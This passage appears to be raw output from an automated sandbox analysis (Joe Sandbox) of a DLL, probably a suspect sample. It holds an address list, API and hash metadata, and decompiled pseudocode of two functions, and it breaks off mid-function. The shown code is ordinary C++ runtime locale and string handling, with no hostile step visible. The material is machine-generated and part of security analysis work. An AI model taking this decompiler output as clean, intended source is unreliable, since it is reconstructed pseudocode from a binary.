              0x6da862b9
              0x6da862be
              0x6da862c6
              0x6da8624b
              0x6da8624b
              0x6da8624d
              0x6da8624e
              0x6da8624f
              0x6da8625d
              0x6da8626b
              0x6da8626c
              0x6da8626f
              0x6da86275
              0x6da86289
              0x6da86289
              0x6da8628b
              0x6da86293
              0x6da8629d
              0x6da86277
              0x6da86277
              0x6da8627a
              0x6da8627f
              0x6da86282
              0x6da86285
              0x00000000
              0x6da86287
              0x6da86287
              0x00000000
              0x6da86287
              0x6da86285
              0x6da86275
              0x6da86249
              0x6da861cc
              0x6da861b8
              0x6da86052
              0x6da86052
              0x6da86055
              0x6da86058
              0x6da860a0
              0x6da860a6
              0x6da860b0
              0x6da860b6
              0x6da860b9
              0x6da860bf
              0x6da860c4
              0x6da860c7
              0x6da860cb
              0x6da860ce
              0x6da860cf
              0x6da86131
              0x6da86132
              0x6da86133
              0x6da8613f
              0x6da8614a
              0x6da86150
              0x6da86158
              0x6da86162
              0x6da860d1
              0x6da860d1
              0x6da860d3
              0x6da860d4
              0x6da860d5
              0x6da860e3
              0x6da860f4
              0x6da860fc
              0x6da860ff
              0x6da86100
              0x6da86106
              0x6da8611a
              0x6da8611a
              0x6da8611c
              0x6da86124
              0x6da8612e
              0x6da86108
              0x6da86108
              0x6da8610b
              0x6da8610e
              0x6da86110
              0x6da86113
              0x6da86116
              0x00000000
              0x6da86118
              0x6da86118
              0x00000000
              0x6da86118
              0x6da86116
              0x6da86106
              0x6da860cf
              0x6da8604c
              0x6da86038
              0x6da85ef2
              0x6da85ef2
              0x6da85ef5
              0x6da85ef8
              0x6da85efb
              0x6da85f46
              0x6da85f49
              0x6da85f4f
              0x6da85f52
              0x6da85f57
              0x6da85f5a
              0x6da85f5e
              0x6da85f61
              0x6da85f62
              0x6da85fb9
              0x6da85fba
              0x6da85fbb
              0x6da85fc7
              0x6da85fd2
              0x6da85fd7
              0x6da85fdf
              0x6da85f64
              0x6da85f64
              0x6da85f66
              0x6da85f67
              0x6da85f68
              0x6da85f76
              0x6da85f7e
              0x6da85f84
              0x6da85f85
              0x6da85f88
              0x6da85f8e
              0x6da85fa2
              0x6da85fa2
              0x6da85fa4
              0x6da85fac
              0x6da85fb6
              0x6da85f90
              0x6da85f90
              0x6da85f93
              0x6da85f96
              0x6da85f98
              0x6da85f9b
              0x6da85f9e
              0x00000000
              0x6da85fa0
              0x6da85fa0
              0x00000000
              0x6da85fa0
              0x6da85f9e
              0x6da85f8e
              0x6da85f62
              0x6da85eec
              0x6da85ed8
              0x6da85e50
              0x6da85e50
              0x6da85e53
              0x6da85e57
              0x6da85e5b
              0x6da85e67
              0x6da85e6a
              0x00000000
              0x6da85e6a
              0x6da85e38
              0x6da85e38
              0x00000000
              0x6da85e38
              0x6da85e2a
              0x6da85e2d
              0x00000000
              0x6da85e2d
              0x6da85e28
              0x6da85e1e
              0x6da85e14
              0x6da85d34
              0x6da85d39
              0x6da85d41
              0x6da85d4b
              0x6da85d51
              0x6da85d56
              0x6da85d5a
              0x6da85d5e
              0x6da85d6a
              0x6da85d6d
              0x00000000
              0x6da85d6d
              0x6da85cbe
              0x6da85cbe
              0x00000000
              0x6da85cbe
              0x6da85cb0
              0x6da85cb3
              0x00000000
              0x6da85cb3
              0x6da85cae
              0x6da85c83
              0x6da85c83
              0x6da85c86
              0x6da85c93
              0x6da85c9d
              0x6da85c9d
              0x6da85c81
              0x6da85b9e
              0x6da85ba3
              0x6da85bab
              0x6da85bb3
              0x6da85bb9
              0x6da85bc4
              0x6da85bc7
              0x6da85bcb
              0x6da85bd0
              0x6da85bd4
              0x6da85bd8
              0x6da85be4
              0x6da85be7
              0x00000000
              0x6da85be7
              0x6da85b28
              0x6da85b28
              0x00000000
              0x6da85b28
              0x6da85b17
              0x6da85b1a
              0x00000000
              0x6da85b1a
              0x6da85b15
              0x6da85ae8
              0x6da85ae8
              0x6da85aeb
              0x6da85af6
              0x6da85b04
              0x6da85b04
              0x6da85ae6

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85A86
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85AA8
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85AC8
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85AEB
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85B5B
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA85BA3
              • __Getctype.LIBCPMT ref: 6DA85BB9
              • std::_Facet_Register.LIBCPMT ref: 6DA85BD8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
              • String ID: bad locale name
              • API String ID: 2622896957-1405518554
              • Opcode ID: 06907635e88ba6797731b0b6aaffc7feff9fca8b6f7b0dcdab66caf9cc7e7a0c
              • Instruction ID: 955578379410fba3849690eb8fecfcbd5b05d3726e4171a344eed0a76a8dfeed
              • Opcode Fuzzy Hash: 06907635e88ba6797731b0b6aaffc7feff9fca8b6f7b0dcdab66caf9cc7e7a0c
              • Instruction Fuzzy Hash: A251A375D0C3499FCB11CFA8D9847AEBBB0FF15310F198159DC55AB282EB30A985CB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E6DA862F0(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
              				char _v8;
              				intOrPtr _v16;
              				char _v20;
              				char _v24;
              				char _v28;
              				char _v32;
              				char _v36;
              				short _v40;
              				char _v44;
              				short _v48;
              				char _v52;
              				char _v56;
              				char _v60;
              				char _v64;
              				char _v68;
              				char _v72;
              				intOrPtr _v76;
              				char _v120;
              				char _v164;
              				void* __esi;
              				intOrPtr _t48;
              				void* _t54;
              				char* _t64;
              				intOrPtr _t66;
              				short _t67;
              				char _t69;
              				char _t70;
              				intOrPtr* _t73;
              				intOrPtr _t76;
              				intOrPtr* _t77;
              				void* _t79;
              				intOrPtr _t81;
              				void* _t83;
              				intOrPtr* _t84;
              				intOrPtr _t85;
              				intOrPtr _t91;
              				void* _t92;
              				void* _t94;
              
              				_push(0xffffffff);
              				_push(E6DAA2715);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t91;
              				_t92 = _t91 - 0x94;
              				_v20 = 0;
              				_t73 = _a4;
              				if(_t73 == 0) {
              					L11:
              					 *[fs:0x0] = _v16;
              					return 4;
              				} else {
              					_t97 =  *_t73;
              					if( *_t73 != 0) {
              						goto L11;
              					} else {
              						_push(_t83);
              						_push(__edi);
              						_t84 = E6DA89399(__edi, _t83, _t97, 0x18);
              						_t94 = _t92 + 4;
              						_a4 = _t84;
              						_t76 = _a8;
              						_v8 = 0;
              						_t6 = _t76 + 4; // 0x61657274
              						_t48 =  *_t6;
              						if(_t48 == 0) {
              							_t81 = 0x6daaf2c7;
              						} else {
              							_t81 =  *((intOrPtr*)(_t48 + 0x18));
              							if(_t81 == 0) {
              								_t8 = _t48 + 0x1c; // 0x61657290
              								_t81 = _t8;
              							}
              						}
              						_t77 =  &_v72;
              						E6DA888D6(_t77, 0);
              						_v68 = 0;
              						_v64 = 0;
              						_v60 = 0;
              						_v56 = 0;
              						_v52 = 0;
              						_v48 = 0;
              						_v44 = 0;
              						_v40 = 0;
              						_v36 = 0;
              						_v32 = 0;
              						_v28 = 0;
              						_v24 = 0;
              						_v8 = 7;
              						_t100 = _t81;
              						if(_t81 == 0) {
              							E6DA88889("bad locale name");
              							goto L13;
              						} else {
              							E6DA88BB9(_t77,  &_v72, _t81);
              							_v20 = 1;
              							 *((intOrPtr*)(_t84 + 4)) = 0;
              							_v8 = 9;
              							 *_t84 = 0x6daa4e30;
              							E6DA8F9AF(_t79, _t84);
              							E6DA88F4F(_t100,  &_v120);
              							 *((intOrPtr*)(_t84 + 8)) = 0;
              							 *((intOrPtr*)(_t84 + 0x10)) = 0;
              							 *((intOrPtr*)(_t84 + 0x14)) = 0;
              							_v76 = _t84;
              							_v8 = 0xa;
              							E6DA88F4F(_t100,  &_v164);
              							_push(1);
              							_push(1);
              							_t64 = E6DA8DD0F();
              							_t94 = _t94 + 0x18;
              							if(_t64 == 0) {
              								L13:
              								E6DA8882C(__eflags);
              								goto L14;
              							} else {
              								_push(1);
              								_push(6);
              								 *_t64 = 0;
              								 *((intOrPtr*)(_t84 + 8)) = _t64;
              								_t77 = E6DA8DD0F();
              								_t94 = _t94 + 8;
              								if(_t77 == 0) {
              									L14:
              									E6DA8882C(__eflags);
              									goto L15;
              								} else {
              									_t66 =  *((intOrPtr*)("false")); // 0x736c6166
              									 *_t77 = _t66;
              									_t67 =  *0x6daaf2f4; // 0x65
              									_push(1);
              									_push(5);
              									 *((short*)(_t77 + 4)) = _t67;
              									 *((intOrPtr*)(_t84 + 0x10)) = _t77;
              									_t77 = E6DA8DD0F();
              									_t94 = _t94 + 8;
              									if(_t77 == 0) {
              										L15:
              										_t54 = E6DA8882C(__eflags);
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										_push(_t84);
              										_t85 =  *_t77;
              										__eflags = _t85;
              										if(_t85 != 0) {
              											E6DA8DCF4( *((intOrPtr*)(_t85 + 8)));
              											E6DA8DCF4( *((intOrPtr*)(_t85 + 0x10)));
              											_t54 = E6DA8DCF4( *((intOrPtr*)(_t85 + 0x14)));
              										}
              										return _t54;
              									} else {
              										_t69 = "true"; // 0x65757274
              										 *_t77 = _t69;
              										_t70 =  *0x6daaf2fc; // 0x0
              										 *((char*)(_t77 + 4)) = _t70;
              										 *((intOrPtr*)(_t84 + 0x14)) = _t77;
              										 *((short*)(_t84 + 0xc)) = 0x2c2e;
              										 *_t73 = _t84;
              										E6DA829E0( &_v72);
              										goto L11;
              									}
              								}
              							}
              						}
              					}
              				}
              			}


              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA86362
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA863AE
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA86498
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA8649D
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA864A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
              • String ID: bad locale name$false$true
              • API String ID: 164343898-1062449267
              • Opcode ID: c03133ba66eb068d3f536f94dcb1ad9946f2ca5657b685948d434db217e5ceea
              • Instruction ID: b868c97513d7fa5add1d267d7a15ef54c227c74f6740479991227bfaff972d36
              • Opcode Fuzzy Hash: c03133ba66eb068d3f536f94dcb1ad9946f2ca5657b685948d434db217e5ceea
              • Instruction Fuzzy Hash: 8B51E37490C305DFEB10CFB4DA4479EBBB0AF05708F18815DE914AB382DBB59A85CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E6DA85C00(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
              				signed int _v0;
              				signed int _v4;
              				signed int _v8;
              				unsigned int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				char _v32;
              				char _v36;
              				signed int _v40;
              				short _v44;
              				signed int _v48;
              				short _v52;
              				intOrPtr _v56;
              				char _v60;
              				char _v64;
              				char _v68;
              				char _v72;
              				char _v76;
              				intOrPtr _v96;
              				signed int _v108;
              				char _v116;
              				signed int _v120;
              				signed int _v132;
              				signed int _v136;
              				signed int _v148;
              				intOrPtr _v156;
              				signed int _v168;
              				signed int _t175;
              				void* _t184;
              				void* _t200;
              				signed int _t203;
              				unsigned int _t205;
              				void* _t206;
              				signed int _t221;
              				signed int _t223;
              				signed int _t224;
              				unsigned int _t226;
              				void* _t227;
              				signed int _t230;
              				signed int _t245;
              				signed int _t247;
              				signed int _t248;
              				unsigned int _t250;
              				void* _t251;
              				signed int _t265;
              				signed int _t267;
              				void* _t270;
              				signed int _t275;
              				signed int _t276;
              				void* _t283;
              				signed int _t288;
              				signed int _t289;
              				signed int _t291;
              				signed int _t293;
              				signed int* _t295;
              				signed int* _t296;
              				signed int* _t297;
              				signed int _t306;
              				signed int* _t312;
              				signed int _t318;
              				void* _t320;
              				void* _t327;
              				void* _t329;
              				signed int _t338;
              				signed int _t339;
              				signed int _t340;
              				signed int _t343;
              				signed int _t345;
              				signed int _t346;
              				unsigned int _t348;
              				signed int _t349;
              				signed int _t360;
              				signed int _t362;
              				signed int _t364;
              				signed int _t365;
              				intOrPtr _t366;
              				signed int _t368;
              				unsigned int _t369;
              				signed int _t370;
              				signed int _t372;
              				signed int _t376;
              				signed int _t377;
              				signed int _t379;
              				signed int _t382;
              				signed int _t383;
              				signed int _t385;
              				signed int _t388;
              				signed int _t390;
              				void* _t392;
              				void* _t393;
              				signed int _t401;
              				void* _t402;
              				signed int _t404;
              				void* _t405;
              				void* _t407;
              				void* _t408;
              				void* _t409;
              				void* _t410;
              				void* _t428;
              
              				_t388 = _t401;
              				_push(0xffffffff);
              				_push(E6DAA265C);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t401;
              				_t402 = _t401 - 0x3c;
              				_push(__ebx);
              				_push(__esi);
              				_push(__edi);
              				E6DA888D6( &_v24, 0);
              				_v8 = 0;
              				_t343 =  *0x6dad5cb4; // 0x0
              				_t291 =  *0x6dad5c7c; // 0x0
              				if(_t343 == 0) {
              					E6DA888D6( &_v20, _t343);
              					_t428 =  *0x6dad5cb4 - _t343; // 0x0
              					if(_t428 == 0) {
              						_t288 =  *0x6dad5048; // 0x0
              						_t289 = _t288 + 1;
              						 *0x6dad5048 = _t289;
              						 *0x6dad5cb4 = _t289;
              					}
              					E6DA8892E( &_v20);
              					_t343 =  *0x6dad5cb4; // 0x0
              				}
              				_t306 =  *(_a4 + 4);
              				if(_t343 >=  *((intOrPtr*)(_t306 + 0xc))) {
              					_t360 = 0;
              					__eflags = 0;
              					goto L8;
              				} else {
              					_t360 =  *( *((intOrPtr*)(_t306 + 8)) + _t343 * 4);
              					if(_t360 == 0) {
              						L8:
              						__eflags =  *((char*)(_t306 + 0x14));
              						if( *((char*)(_t306 + 0x14)) == 0) {
              							L11:
              							__eflags = _t360;
              							if(_t360 != 0) {
              								goto L6;
              							} else {
              								goto L12;
              							}
              						} else {
              							_t283 = E6DA88AB3();
              							__eflags = _t343 -  *((intOrPtr*)(_t283 + 0xc));
              							if(_t343 >=  *((intOrPtr*)(_t283 + 0xc))) {
              								L12:
              								__eflags = _t291;
              								if(__eflags == 0) {
              									_t360 = E6DA89399(_t343, _t360, __eflags, 8);
              									_t404 = _t402 + 4;
              									_v20 = _t360;
              									_t175 =  *(_a4 + 4);
              									__eflags = _t175;
              									if(_t175 == 0) {
              										_t345 = 0x6daaf2c7;
              									} else {
              										_t345 =  *(_t175 + 0x18);
              										__eflags = _t345;
              										if(_t345 == 0) {
              											_t345 = _t175 + 0x1c;
              										}
              									}
              									E6DA888D6( &_v76, 0);
              									_v72 = 0;
              									_v68 = 0;
              									_v64 = 0;
              									_v60 = 0;
              									_v56 = 0;
              									_v52 = 0;
              									_v48 = 0;
              									_v44 = 0;
              									_v40 = 0;
              									_v36 = 0;
              									_v32 = 0;
              									_v28 = 0;
              									_v8 = 8;
              									__eflags = _t345;
              									if(_t345 == 0) {
              										E6DA88889("bad locale name");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										_push(_t388);
              										_t390 = _t404;
              										_push(0xffffffff);
              										_push(E6DAA2685);
              										_push( *[fs:0x0]);
              										 *[fs:0x0] = _t404;
              										_t405 = _t404 - 0xc;
              										_push(_t291);
              										_push(_t360);
              										_push(_t345);
              										E6DA888D6( &_v116, 0);
              										_v96 = 0;
              										_t346 =  *0x6dad5cb8; // 0x0
              										_t293 =  *0x6dad5c78; // 0x0
              										_v108 = _t293;
              										__eflags = _t346;
              										if(_t346 == 0) {
              											E6DA888D6( &_v28, _t346);
              											__eflags =  *0x6dad5cb8 - _t346; // 0x0
              											if(__eflags == 0) {
              												_t275 =  *0x6dad5048; // 0x0
              												_t276 = _t275 + 1;
              												__eflags = _t276;
              												 *0x6dad5048 = _t276;
              												 *0x6dad5cb8 = _t276;
              											}
              											E6DA8892E( &_v28);
              											_t346 =  *0x6dad5cb8; // 0x0
              										}
              										_t312 =  *(_v0 + 4);
              										__eflags = _t346 - _t312[3];
              										if(_t346 >= _t312[3]) {
              											_t362 = 0;
              											__eflags = 0;
              											goto L29;
              										} else {
              											_t362 =  *(_t312[2] + _t346 * 4);
              											__eflags = _t362;
              											if(_t362 != 0) {
              												L37:
              												E6DA8892E( &_v32);
              												 *[fs:0x0] = _v20;
              												return _t362;
              											} else {
              												L29:
              												__eflags = _t312[5];
              												if(_t312[5] == 0) {
              													L32:
              													__eflags = _t362;
              													if(_t362 != 0) {
              														goto L37;
              													} else {
              														goto L33;
              													}
              												} else {
              													_t270 = E6DA88AB3();
              													__eflags = _t346 -  *((intOrPtr*)(_t270 + 0xc));
              													if(_t346 >=  *((intOrPtr*)(_t270 + 0xc))) {
              														L33:
              														__eflags = _t293;
              														if(_t293 == 0) {
              															_t184 = E6DA862F0(_t293, _t346,  &_v24, _v0);
              															_t407 = _t405 + 8;
              															__eflags = _t184 - 0xffffffff;
              															if(__eflags == 0) {
              																E6DA82950();
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																_push(_t390);
              																_t392 = _t407;
              																_t408 = _t407 - 8;
              																_push(_t293);
              																_t295 = _t312;
              																_t315 = 0x7fffffff;
              																_push(_t362);
              																_t364 = _v120;
              																_t338 = _t295[4];
              																_v132 = _t338;
              																_push(_t346);
              																__eflags = 0x7fffffff - _t338 - _t364;
              																if(__eflags < 0) {
              																	E6DA814C0(_t295, 0x7fffffff, _t338, __eflags);
              																	goto L60;
              																} else {
              																	_t346 = _t295[5];
              																	_t248 = _t338 + _t364;
              																	_v20 = _t248;
              																	_t382 = _t248 | 0x0000000f;
              																	_v4 = _t346;
              																	__eflags = _t382 - 0x7fffffff;
              																	if(__eflags <= 0) {
              																		_t250 = _t346 >> 1;
              																		_t315 = 0x7fffffff - _t250;
              																		__eflags = _t346 - _t315;
              																		if(__eflags <= 0) {
              																			_t251 = _t250 + _t346;
              																			__eflags = _t382 - _t251;
              																			_t364 =  <  ? _t251 : _t382;
              																			_t77 = _t364 + 1; // 0x80000000
              																			_t315 = _t77;
              																			__eflags = _t315 - 0x1000;
              																			if(_t315 < 0x1000) {
              																				__eflags = _t315;
              																				if(__eflags == 0) {
              																					_t346 = 0;
              																					__eflags = 0;
              																				} else {
              																					_t265 = E6DA89399(_t346, _t364, __eflags, _t315);
              																					_t338 = _v16;
              																					_t408 = _t408 + 4;
              																					_t346 = _t265;
              																				}
              																				goto L53;
              																			} else {
              																				_t78 =  &(_t315[8]); // 0x80000023
              																				_t266 = _t78;
              																				__eflags = _t78 - _t315;
              																				if(__eflags <= 0) {
              																					L60:
              																					E6DA81420();
              																					goto L61;
              																				} else {
              																					goto L43;
              																				}
              																			}
              																		} else {
              																			_t364 = 0x7fffffff;
              																			goto L42;
              																		}
              																	} else {
              																		_t364 = 0x7fffffff;
              																		L42:
              																		_t266 = 0x80000023;
              																		L43:
              																		_t267 = E6DA89399(_t346, _t364, __eflags, _t266);
              																		_t408 = _t408 + 4;
              																		__eflags = _t267;
              																		if(_t267 == 0) {
              																			L61:
              																			E6DA8DACF(_t295, _t315, _t338);
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			_push(_t392);
              																			_t393 = _t408;
              																			_t409 = _t408 - 0xc;
              																			_t339 = _v136;
              																			_push(_t295);
              																			_t296 = _t315;
              																			_t316 = 0x7fffffff;
              																			_push(_t364);
              																			_push(_t346);
              																			_t365 = _t296[4];
              																			_v148 = _t365;
              																			__eflags = 0x7fffffff - _t365 - _t339;
              																			if(__eflags < 0) {
              																				E6DA814C0(_t296, 0x7fffffff, _t339, __eflags);
              																				goto L83;
              																			} else {
              																				_t346 = _t296[5];
              																				_t224 = _t365 + _t339;
              																				_v24 = _t224;
              																				_t376 = _t224 | 0x0000000f;
              																				_v8 = _t346;
              																				__eflags = _t376 - 0x7fffffff;
              																				if(__eflags <= 0) {
              																					_t226 = _t346 >> 1;
              																					_t316 = 0x7fffffff - _t226;
              																					__eflags = _t346 - _t316;
              																					if(__eflags <= 0) {
              																						_t227 = _t226 + _t346;
              																						__eflags = _t376 - _t227;
              																						_t365 =  <  ? _t227 : _t376;
              																						_t107 = _t365 + 1; // 0x80000000
              																						_t316 = _t107;
              																						__eflags = _t316 - 0x1000;
              																						if(_t316 < 0x1000) {
              																							__eflags = _t316;
              																							if(__eflags == 0) {
              																								_t346 = 0;
              																								__eflags = 0;
              																							} else {
              																								_t245 = E6DA89399(_t346, _t365, __eflags, _t316);
              																								_t409 = _t409 + 4;
              																								_t346 = _t245;
              																							}
              																							goto L76;
              																						} else {
              																							_t108 = _t316 + 0x23; // 0x80000023
              																							_t246 = _t108;
              																							__eflags = _t108 - _t316;
              																							if(__eflags <= 0) {
              																								L83:
              																								E6DA81420();
              																								goto L84;
              																							} else {
              																								goto L66;
              																							}
              																						}
              																					} else {
              																						_t365 = 0x7fffffff;
              																						goto L65;
              																					}
              																				} else {
              																					_t365 = 0x7fffffff;
              																					L65:
              																					_t246 = 0x80000023;
              																					L66:
              																					_t247 = E6DA89399(_t346, _t365, __eflags, _t246);
              																					_t409 = _t409 + 4;
              																					__eflags = _t247;
              																					if(_t247 == 0) {
              																						L84:
              																						E6DA8DACF(_t296, _t316, _t339);
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						asm("int3");
              																						_push(_t393);
              																						_t410 = _t409 - 8;
              																						_push(_t296);
              																						_t297 = _t316;
              																						_t317 = 0x7fffffff;
              																						_push(_t365);
              																						_t366 = _v156;
              																						_t340 = _t297[4];
              																						_v168 = _t340;
              																						_push(_t346);
              																						__eflags = 0x7fffffff - _t340 - _t366;
              																						if(__eflags < 0) {
              																							E6DA814C0(_t297, 0x7fffffff, _t340, __eflags);
              																							goto L106;
              																						} else {
              																							_t348 = _t297[5];
              																							_t203 = _t340 + _t366;
              																							_v28 = _t203;
              																							_t368 = _t203 | 0x0000000f;
              																							_v12 = _t348;
              																							__eflags = _t368 - 0x7fffffff;
              																							if(__eflags <= 0) {
              																								_t205 = _t348 >> 1;
              																								_t317 = 0x7fffffff - _t205;
              																								__eflags = _t348 - _t317;
              																								if(__eflags <= 0) {
              																									_t206 = _t205 + _t348;
              																									__eflags = _t368 - _t206;
              																									_t369 =  <  ? _t206 : _t368;
              																									_t146 = _t369 + 1; // 0x80000000
              																									_t317 = _t146;
              																									__eflags = _t317 - 0x1000;
              																									if(_t317 < 0x1000) {
              																										__eflags = _t317;
              																										if(__eflags == 0) {
              																											_t349 = 0;
              																											__eflags = 0;
              																										} else {
              																											_t221 = E6DA89399(_t348, _t369, __eflags, _t317);
              																											_t340 = _v24;
              																											_t410 = _t410 + 4;
              																											_t349 = _t221;
              																										}
              																										goto L99;
              																									} else {
              																										_t147 = _t317 + 0x23; // 0x80000023
              																										_t222 = _t147;
              																										__eflags = _t147 - _t317;
              																										if(__eflags <= 0) {
              																											L106:
              																											E6DA81420();
              																											goto L107;
              																										} else {
              																											goto L89;
              																										}
              																									}
              																								} else {
              																									_t369 = 0x7fffffff;
              																									goto L88;
              																								}
              																							} else {
              																								_t369 = 0x7fffffff;
              																								L88:
              																								_t222 = 0x80000023;
              																								L89:
              																								_t223 = E6DA89399(_t348, _t369, __eflags, _t222);
              																								_t410 = _t410 + 4;
              																								__eflags = _t223;
              																								if(_t223 == 0) {
              																									L107:
              																									_t200 = E6DA8DACF(_t297, _t317, _t340);
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									asm("int3");
              																									_t318 =  *_t317;
              																									__eflags = _t318;
              																									if(_t318 != 0) {
              																										return  *((intOrPtr*)( *_t318))(1);
              																									}
              																									return _t200;
              																								} else {
              																									_t340 = _v24;
              																									_t144 = _t223 + 0x23; // 0x23
              																									_t349 = _t144 & 0xffffffe0;
              																									 *(_t349 - 4) = _t223;
              																									L99:
              																									_t297[4] = _v28;
              																									_t297[5] = _t369;
              																									_t370 = _t349 + _t340;
              																									_v28 = _t370;
              																									__eflags = _v12 - 0x10;
              																									_v24 = _v4 + _t370;
              																									_push(_t340);
              																									if(_v12 < 0x10) {
              																										_push(_t297);
              																										_push(_t349);
              																										E6DA8AB10();
              																										E6DA8B0A0(_t349, _t370, _v0, _v4);
              																										 *_v24 = 0;
              																										 *_t297 = _t349;
              																										return _t297;
              																									} else {
              																										_t372 =  *_t297;
              																										_push(_t372);
              																										_push(_t349);
              																										E6DA8AB10();
              																										E6DA8B0A0(_t349, _v28, _v0, _v4);
              																										_t320 = _v12 + 1;
              																										 *_v24 = 0;
              																										__eflags = _t320 - 0x1000;
              																										if(_t320 < 0x1000) {
              																											L103:
              																											_push(_t320);
              																											E6DA893C9(_t372);
              																											 *_t297 = _t349;
              																											return _t297;
              																										} else {
              																											_t340 =  *(_t372 - 4);
              																											_t317 = _t320 + 0x23;
              																											_t165 = _t372 - _t340 - 4; // 0x7ffffffb
              																											__eflags = _t165 - 0x1f;
              																											if(_t165 > 0x1f) {
              																												goto L107;
              																											} else {
              																												_t372 = _t340;
              																												goto L103;
              																											}
              																										}
              																									}
              																								}
              																							}
              																						}
              																					} else {
              																						_t105 = _t247 + 0x23; // 0x23
              																						_t346 = _t105 & 0xffffffe0;
              																						 *(_t346 - 4) = _t247;
              																						L76:
              																						_t296[4] = _v24;
              																						_t230 = _v0;
              																						_t296[5] = _t365;
              																						_v20 = _v20 - _t230 + 1;
              																						_t377 = _t346 + _t230;
              																						_v28 = _t377;
              																						__eflags = _v8 - 0x10;
              																						_v24 = _a4 + _t377;
              																						_push(_t230);
              																						if(_v8 < 0x10) {
              																							_push(_t296);
              																							_push(_t346);
              																							E6DA8AB10();
              																							E6DA8B0A0(_t346, _t377, _a8, _a4);
              																							__eflags = _t296 + _v0;
              																							E6DA8AB10(_v24, _t296 + _v0, _v20);
              																							 *_t296 = _t346;
              																							return _t296;
              																						} else {
              																							_t379 =  *_t296;
              																							_push(_t379);
              																							_push(_t346);
              																							E6DA8AB10();
              																							E6DA8B0A0(_t346, _v28, _a8, _a4);
              																							E6DA8AB10(_v24, _v0 + _t379, _v20);
              																							_t409 = _t409 + 0x24;
              																							_t327 = _v8 + 1;
              																							__eflags = _t327 - 0x1000;
              																							if(_t327 < 0x1000) {
              																								L80:
              																								_push(_t327);
              																								E6DA893C9(_t379);
              																								 *_t296 = _t346;
              																								return _t296;
              																							} else {
              																								_t339 =  *(_t379 - 4);
              																								_t316 = _t327 + 0x23;
              																								_t365 = _t379 - _t339;
              																								_t130 = _t365 - 4; // 0x7ffffffb
              																								__eflags = _t130 - 0x1f;
              																								if(_t130 > 0x1f) {
              																									goto L84;
              																								} else {
              																									_t379 = _t339;
              																									goto L80;
              																								}
              																							}
              																						}
              																					}
              																				}
              																			}
              																		} else {
              																			_t338 = _v16;
              																			_t75 = _t267 + 0x23; // 0x23
